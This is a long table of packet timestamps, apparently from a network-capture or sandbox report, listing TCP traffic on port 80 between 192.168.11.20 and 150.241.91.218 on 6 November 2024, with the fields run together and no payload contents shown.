                                                                                                                                                              Nov 6, 2024 17:34:06.875663042 CET4975680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:06.875663042 CET4975680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:06.875735998 CET4975680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:07.063980103 CET8049756150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:07.064049006 CET8049756150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:07.064901114 CET8049756150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:07.135812044 CET8049756150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:07.184998035 CET4975680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.288991928 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.477849960 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.478238106 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.478322029 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.478542089 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.478615046 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.666805983 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.666868925 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.666903973 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.667038918 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.667216063 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.667382956 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.667659998 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.667938948 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.668114901 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.856051922 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.856091022 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.856115103 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.856316090 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.856399059 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.856506109 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:21.856585979 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.856734991 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:21.856894970 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.044986963 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.045289040 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.045428038 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.045435905 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.045459986 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.045748949 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.045758009 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.045954943 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.046120882 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.046363115 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.046550989 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.047372103 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.047549963 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.047713041 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.233880043 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.234199047 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.234210014 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.234366894 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.234518051 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.234683990 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.234721899 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.234762907 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.235208988 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.235399961 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.235519886 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.235702991 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.235760927 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.235799074 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.236176014 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.236244917 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.236284018 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.236321926 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.236366034 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.236498117 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.236712933 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.236803055 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.236834049 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.237049103 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.237175941 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.237373114 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.424010038 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.424323082 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.424494982 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.424556971 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.424566984 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.424576998 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.424845934 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.425051928 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.425235033 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.425335884 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.425344944 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.425355911 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.425664902 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.425712109 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.425842047 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.425977945 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.426178932 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.426632881 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.426642895 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.426955938 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.427036047 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.427186966 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.427267075 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.427469969 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.427561045 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.427572012 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.428006887 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.428145885 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.428244114 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.428307056 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.428503036 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.428544044 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.428670883 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.428812027 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.429011106 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.429128885 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.429140091 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.429351091 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.429492950 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.429841042 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.429852009 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.430202007 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.430377007 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.430445910 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.430541992 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.430738926 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.431159019 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.431251049 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.431499958 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.431617975 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.431792974 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.431936026 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.432327986 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.432383060 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.432576895 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.432749033 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.432897091 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.433007956 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.433022022 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.433254957 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.433433056 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.433453083 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.433558941 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.433582067 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.433748007 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.433913946 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.612834930 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.612853050 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.613128901 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.613253117 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.613955975 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.613970995 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.613985062 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.613995075 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.614005089 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.614248991 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.614259005 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.614274025 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.614288092 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.614423990 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.614521027 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.614535093 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.614593029 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.614737988 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.614794016 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.614907026 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.615052938 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.615103960 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.615175009 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.615272999 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.615416050 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.615634918 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.615797043 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.615911007 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.615921021 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.615936995 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.615962029 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.616136074 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.616285086 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.616312981 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.616399050 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.616458893 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.616511106 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.616645098 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.616791010 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.616960049 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.617038012 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.617048979 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.617130041 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.617132902 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.617300987 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.617472887 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.617644072 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.617835999 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.617978096 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.617990017 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.618001938 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.618227959 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.618395090 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.618565083 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.618638992 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.618659973 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.618678093 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.618738890 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.619312048 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.619332075 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.619352102 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.619688034 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.619862080 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.620043993 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.620069027 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.620089054 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.620207071 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.620292902 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.620367050 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.620529890 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.620685101 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.620693922 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.620937109 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.620949984 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.621026039 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.621026993 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.621191025 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.621364117 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.621553898 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.621555090 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.621567965 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.621726990 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.621756077 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.621762991 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.622066021 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.622245073 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.622245073 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.622345924 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.622406960 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.622553110 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.622724056 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.622729063 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.622824907 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.622831106 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.622837067 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.622914076 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.623086929 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.623255014 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.623367071 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.623373985 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.623382092 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.623404026 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.623573065 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.623766899 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.623914957 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.624108076 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.801553965 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.801589966 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.801897049 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.802032948 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.802169085 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.802196026 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.802550077 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.802733898 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.802762032 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.802795887 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.802898884 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.803075075 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.803092957 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.803114891 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.803173065 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.803190947 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.803232908 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.803406954 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.803548098 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.803623915 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.803647041 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.803718090 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.803740025 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.803888083 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.804059029 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.804222107 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.804229975 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.804249048 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.804271936 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.804594994 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.804634094 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.804656029 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.804750919 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.804770947 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.804771900 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.804940939 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.805100918 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.805244923 CET4975780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:34:22.805345058 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.805363894 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.805387974 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.805969000 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.805988073 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.806010008 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.806691885 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.806711912 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.806735039 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.806752920 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.807066917 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.807090044 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.807606936 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.807626963 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.807719946 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.807738066 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.808038950 CET8049757150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:34:22.808562994 CET8049757150.241.91.218192.168.11.20
